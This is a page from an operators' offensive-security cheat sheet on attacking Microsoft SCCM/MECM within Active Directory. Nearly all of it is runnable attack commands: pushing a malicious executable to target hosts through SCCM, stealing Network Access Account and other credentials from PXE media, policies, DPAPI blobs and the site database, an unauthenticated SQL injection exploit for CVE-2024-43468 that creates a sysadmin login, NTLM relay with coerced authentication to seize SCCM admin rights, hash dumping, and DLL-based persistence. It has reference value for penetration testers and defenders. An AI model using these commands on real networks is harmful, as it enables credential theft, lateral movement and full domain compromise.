daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

deployment-sccm.md (16493B)


      1 ---
      2 title: "Deployment - SCCM"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/deployment-sccm.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/deployment-sccm.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Deployment - SCCM
     12 
     13 > SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation.
     14 
     15 ## SCCM Application Deployment
     16 
     17 > Application Deployment is a process that involves packaging software applications and distributing them to selected computers or devices within an organization
     18 
     19 **Tools**:
     20 
     21 * [PowerShellMafia/PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM)
     22 * [nettitude/MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM)
     23 
     24 **Exploitation**:
     25 
     26 * Using **SharpSCCM**
     27 
     28   ```ps1
     29   .\SharpSCCM.exe get devices --server <SERVER8NAME> --site-code <SITE_CODE>
     30   .\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
     31   .\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug
     32   ```
     33 
     34 * Compromise client, use locate to find management server
     35 
     36     ```ps1
     37     MalSCCM.exe locate
     38     ```
     39 
     40 * Enumerate over WMI as an administrator of the Distribution Point
     41 
     42     ```ps1
     43     MalSCCM.exe inspect /server:<DistributionPoint Server FQDN> /groups
     44     ```
     45 
     46 * Compromise management server, use locate to find primary server
     47 * Use `inspect` on primary server to view who you can target
     48 
     49     ```ps1
     50     MalSCCM.exe inspect /all
     51     MalSCCM.exe inspect /computers
     52     MalSCCM.exe inspect /primaryusers
     53     MalSCCM.exe inspect /groups
     54     ```
     55 
     56 * Create a new device group for the machines you want to laterally move too
     57 
     58     ```ps1
     59     MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
     60     MalSCCM.exe inspect /groups
     61     ```
     62 
     63 * Add your targets into the new group
     64 
     65     ```ps1
     66     MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL
     67     ```
     68 
     69 * Create an application pointing to a malicious EXE on a world readable share : `SCCMContentLib$`
     70 
     71     ```ps1
     72     MalSCCM.exe app /create /name:demoapp /uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe"
     73     MalSCCM.exe inspect /applications
     74     ```
     75 
     76 * Deploy the application to the target group
     77 
     78     ```ps1
     79     MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment
     80     MalSCCM.exe inspect /deployments
     81     ```
     82 
     83 * Force the target group to checkin for updates
     84 
     85     ```ps1
     86     MalSCCM.exe checkin /groupname:TargetGroup
     87     ```
     88 
     89 * Cleanup the application, deployment and group
     90 
     91     ```ps1
     92     MalSCCM.exe app /cleanup /name:demoapp
     93     MalSCCM.exe group /delete /groupname:TargetGroup
     94     ```
     95 
     96 ## SCCM Enumeration
     97 
     98 * [garrettfoster13/sccmhunter](https://github.com/garrettfoster13/sccmhunter) - SCCMHunter is a post-ex tool built to streamline identifying, profiling, and attacking SCCM related assets in an Active Directory domain.
     99 
    100     ```ps1
    101     sccmhunter.py find -u user -p P@ssw0rd -dc-ip 10.10.10.10 -d lab.lan
    102     sccmhunter.py show -siteservers
    103     ```
    104 
    105 ## SCCM Shares
    106 
    107 > Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
    108 
    109 * [1njected/CMLoot](https://github.com/1njected/CMLoot)
    110 
    111   ```ps1
    112   Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt
    113   Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml
    114   Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi
    115   ```
    116 
    117 * [synacktiv/SCCMSecrets](https://github.com/synacktiv/SCCMSecrets)
    118 
    119     ```ps1
    120     SCCMSecrets.py files --distribution-point 'sccm.lab.local/' --username 'username' --password 'P@ssw0rd'
    121     ```
    122 
    123 ## SCCM Configuration Manager
    124 
    125 * [subat0mik/Misconfiguration-Manager/MisconfigurationManager.ps1](https://github.com/subat0mik/Misconfiguration-Manager) - Misconfiguration Manager is a central knowledge base for all known Microsoft Configuration Manager tradecraft and associated defensive and hardening guidance.
    126 
    127 ### CRED-1 Retrieve credentials via PXE boot media
    128 
    129 * [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md)
    130 
    131 **Requirements**:
    132 
    133 * On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1
    134 * On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1
    135 * PXE-enabled distribution point
    136 
    137 **Exploitation**:
    138 
    139 * [csandker/pxethiefy](https://github.com/csandker/pxethiefy)
    140 
    141     ```ps1
    142     sudo python3 pxethiefy.py explore -i eth0
    143     ```
    144 
    145 * [MWR-CyberSec/PXEThief](https://github.com/MWR-CyberSec/PXEThief), [PR #11](https://github.com/MWR-CyberSec/PXEThief/pull/11) - Removing win32crypt dependency for full Linux support
    146 
    147     ```ps1
    148     python pxethief.py 2 10.10.10.10
    149     ```
    150 
    151 ### CRED-2 Request a policy containing credentials
    152 
    153 * [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md)
    154 
    155 **Requirements**:
    156 
    157 * PKI certificates are not required for client authentication
    158 * Domain accounts credential
    159 
    160 **Exploitation**:
    161 
    162 Create a machine or compromise an existing one, then request policies such as `NAAConfig`
    163 
    164 Easy mode using `SharpSCCM`
    165 
    166 ```ps1
    167 addcomputer.py -computer-name 'attacker$' -computer-pass P@ssw0rd -dc-ip 10.10.10.10 lab.lan/user:'P@ssw0rd'
    168 SharpSCCM.exe get naa -r newdevice -u attacker$ -p P@ssw0rd
    169 SharpSCCM get naa
    170 SharpSCCM get secrets -u <username-machine-$> -p <password>
    171 ```
    172 
    173 Stealthy mode by creating a computer.
    174 
    175 * Create a machine account with a specific password: `addcomputer.py -computer-name 'customsccm$' -computer-pass 'YourStrongPassword123*' 'sccm.lab/carol:SCCMftw' -dc-ip 192.168.33.10`
    176 * In your `/etc/hosts` file, add an entry for the MECM server: `192.168.33.11 MECM MECM.SCCM.LAB`
    177 * Use `sccmwtf` to request a policy: `python3 sccmwtf.py fake fakepc.sccm.lab MECM 'SCCMLAB\customsccm$' 'YourStrongPassword123*'`
    178 * Parse the policy to extract the credentials and decrypt them using [sccmwtf/policysecretunobfuscate.py](https://github.com/xpn/sccmwtf/blob/main/policysecretunobfuscate.py): `cat /tmp/naapolicy.xml |grep 'NetworkAccessUsername\|NetworkAccessPassword' -A 5 |grep -e 'CDATA' | cut -d '[' -f 3|cut -d ']' -f 1| xargs -I {} python3 policysecretunobfuscate.py {}`
    179 
    180 ### CRED-3 Extract currently deployed credentials stored as DPAPI blobs
    181 
    182 > Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
    183 
    184 * [Misconfiguration-Manager - CRED-3](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-3/cred-3_description.md)
    185 
    186 **Requirements**:
    187 
    188 * Local administrator privileges on an SCCM client
    189 
    190 **Exploitation**:
    191 
    192 * Find SCCM blob
    193 
    194     ```ps1
    195     Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
    196     NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
    197     NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
    198     ```
    199 
    200 * Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244)
    201 
    202     ```ps1
    203     $str = "060...F2DAF"
    204     $bytes = for($i=0; $i -lt $str.Length; $i++) {[byte]::Parse($str.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber); $i++}
    205     $b64 = [Convert]::ToBase64String($bytes[4..$bytes.Length])
    206     .\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt    
    207     ```
    208 
    209 * Using [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption
    210 
    211     ```ps1
    212     .\SharpSCCM.exe local secrets -m wmi
    213     ```
    214 
    215 From a remote machine.
    216 
    217 * Using [garrettfoster13/sccmhunter](https://github.com/garrettfoster13/sccmhunter)
    218 
    219     ```ps1
    220     python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. -auto
    221     ```
    222 
    223 ### CRED-4 Extract legacy credentials stored as DPAPI blobs
    224 
    225 * [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md)
    226 
    227 **Requirements**:
    228 
    229 * Local administrator privileges on an SCCM client
    230 
    231 **Exploitation**:
    232 
    233 * Search the database using `SharpDPAPI`
    234 
    235     ```ps1
    236     .\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA
    237     ```
    238 
    239 * Search the database using `SharpSCCM`
    240 
    241     ```ps1
    242     .\SharpSCCM.exe local secrets -m disk
    243     ```
    244 
    245 * Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
    246 
    247     ```ps1
    248     Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl
    249     ConvertFrom-SddlString ""
    250     ```
    251 
    252 ### CRED-5 Extract the SC_UserAccount table from the site database
    253 
    254 * [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md)
    255 
    256 **Requirements**:
    257 
    258 * Site database access
    259 * Primary site server access
    260     * Access to the private key used for encryption
    261 
    262 **Exploitation**:
    263 
    264 * [gentilkiwi/mimikatz](https://twitter.com/gentilkiwi/status/1392204021461569537)
    265 
    266     ```ps1
    267     mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=ConfigMgr_CHQ;SERVER=CM1;"
    268     ```
    269 
    270 * [skahwah/SQLRecon](https://github.com/skahwah/SQLRecon), only if the site server and database are hosted on the same system
    271 
    272     ```ps1
    273     SQLRecon.exe /auth:WinToken /host:CM1 /database:ConfigMgr_CHQ /module:sDecryptCredentials
    274     ```
    275 
    276 * SQLRecon + [xpn/sccmdecryptpoc.cs](https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1)
    277 
    278     ```ps1
    279     SQLRecon.exe /auth:WinToken /host:<SITE-DB> /database:CM_<SITECODE> /module:query /command:"SELECT * FROM SC_UserAccount"
    280     sccmdecryptpoc.exe 0C010000080[...]5D6F0
    281     ```
    282 
    283 ### Unauthenticated SQL Injection - CVE-2024-43468
    284 
    285 * [synacktiv/CVE-2024-43468](https://github.com/synacktiv/CVE-2024-43468) - Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Unauthenticated SQL injections (CVE-2024-43468) exploit
    286 
    287 ```ps1
    288 $ CVE-2024-43468.py -t cmc.corp.local -sql "create login [CORP\user1] from windows ; exec master.dbo.sp_addsrvrolemember [CORP\user1], 'sysadmin'"
    289 $ mssqlclient.py -debug -windows-auth 'CORP/user1:xxx'@cmc-db.corp.local
    290 SQL> select name from sysdatabases where name like 'CM_%'
    291 ```
    292 
    293 ## SCCM Relay
    294 
    295 ### TAKEOVER1 - Low Privileges to Database Administrator - MSSQL relay
    296 
    297 **Requirements**:
    298 
    299 * Database separated from the site server
    300 * Server site is sysadmin of the database
    301 
    302 **Exploitation**:
    303 
    304 * Generate the query to elevate our user:
    305 
    306     ```ps1
    307     python3 sccmhunter.py mssql -u carol -p SCCMftw -d sccm.lab -dc-ip 192.168.33.10 -debug -tu carol -sc P01 -stacked
    308     ```
    309 
    310 * Setup a relay with the generated query:
    311 
    312     ```ps1
    313     ntlmrelayx.py -smb2support -ts -t mssql://192.168.33.12 -q "USE CM_P01; INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (0x01050000000000051500000058ED3FD3BF25B04EDE28E7B85A040000,'SCCMLAB\carol',0,0,'','','','','P01');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'),'SMS0001R','SMS00ALL','29');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'),'SMS0001R','SMS00001','1'); INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'),'SMS0001R','SMS00004','1');"
    314     ```
    315 
    316 * Coerce an authentication to your listener using a domain account:
    317 
    318     ```ps1
    319     petitpotam.py -d sccm.lab -u carol -p SCCMftw 192.168.33.1 192.168.33.11
    320     ```
    321 
    322 * Finally, connect as admin on the MSSQL server:
    323 
    324     ```ps1
    325     python3 sccmhunter.py admin -u carol@sccm.lab -p 'SCCMftw' -ip 192.168.33.11
    326     ```
    327 
    328 ### TAKEOVER2 - Low Privileges to MECM Admin Account - SMB relay
    329 
    330 Microsoft requires the site server's computer account to be an administrator on the MSSQL server.
    331 
    332 **Exploitation**:
    333 
    334 * Start a listener for the MSSQL Server: `ntlmrelayx -t 192.168.33.12 -smb2support -socks`
    335 * Coerce an authentication from the Site Server using domain credentials (low privileges SCCM NAA retrieved on the same machine works great): `petitpotam.py -d sccm.lab -u sccm-naa -p 123456789 192.168.33.1 192.168.33.11`
    336 * Finally use the SOCKS from `ntlmrelayx` to access the MSSQL server as a local administrator
    337 
    338     ```ps1
    339     proxychains -q smbexec.py -no-pass SCCMLAB/'MECM$'@192.168.33.12 
    340     proxychains -q secretsdump.py -no-pass SCCMLAB/'MECM$'@192.168.33.12 
    341     ```
    342 
    343 ### ELEVATE 2 - NTLM Relay with Automatic Client Push Authentication
    344 
    345 **Requirements**:
    346 
    347 * Automatic site-wide client push installation enabled
    348 * Automatic site device approval
    349 * Fallback authentication to NTLM
    350 
    351 **Exploitation**:
    352 
    353 ```ps1
    354 SharpSCCM.exe invoke client-push -t 192.168.1.50
    355 ntlmrelayx.py -t mssql01.lab.lan -smb2support
    356 ```
    357 
    358 ## SCCM Persistence
    359 
    360 * [mandiant/CcmPwn](https://github.com/mandiant/CcmPwn) - lateral movement script that leverages the CcmExec service to remotely hijack user sessions.
    361 
    362 CcmExec is a service native to SCCM Windows clients that is executed on every interactive session. This technique requires Adminsitrator privileges on the targeted machine.
    363 
    364 * Backdoor the `SCNotification.exe.config` to load your DLL
    365 
    366     ```ps1
    367     python3 ccmpwn.py domain/user:password@workstation.domain.local exec -dll evil.dll -config exploit.config
    368     ```
    369 
    370 * Malicious config to force `SCNotification.exe` to load a file from an attacker-controlled file share
    371 
    372     ```ps1
    373     python3 ccmpwn.py domain/user:password@workstation.domain.local coerce -computer 10.10.10.10
    374     ```
    375 
    376 ## References
    377 
    378 * [Attacking and Defending Configuration Manager - An Attackers Easy Win - Logan Goins - April 25, 2025](https://logan-goins.com/2025-04-25-sccm/)
    379 * [Decrypting the Forest From the Trees - Garrett Foster - March 6, 2025](https://specterops.io/blog/2025/03/06/decrypting-the-forest-from-the-trees/)
    380 * [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - May 13, 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
    381 * [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - July 9, 2022](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
    382 * [Further Adventures With CMPivot — Client Coercion - Diego Lomellini - February 3, 2025](https://posts.specterops.io/further-adventures-with-cmpivot-client-coercion-38b878b740ac)
    383 * [Introducing ConfigManBearPig, a BloodHound OpenGraph Collector for SCCM - Chris Thompson - January 13, 2026](https://specterops.io/blog/2026/01/13/introducing-configmanbearpig-a-bloodhound-opengraph-collector-for-sccm/)
    384 * [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/)
    385 * [Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - March 5, 2024](https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d)
    386 * [Network Access Accounts are evil… - Roger Zander - September 13, 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
    387 * [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - June 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
    388 * [SCCM / MECM LAB - Part 0x0 - mayfly - March 23, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x0/)
    389 * [SCCM / MECM LAB - Part 0x1 - Recon and PXE - mayfly - March 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x1/)
    390 * [SCCM / MECM LAB - Part 0x2 - Low user - mayfly - March 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x2/)
    391 * [SCCM / MECM LAB - Part 0x3 - Admin User - mayfly - April 3, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x3/)
    392 * [SeeSeeYouExec: Windows Session Hijacking via CcmExec - Andrew Oliveau - March 28, 2024](https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en)
    393 * [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - June 28, 2022](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)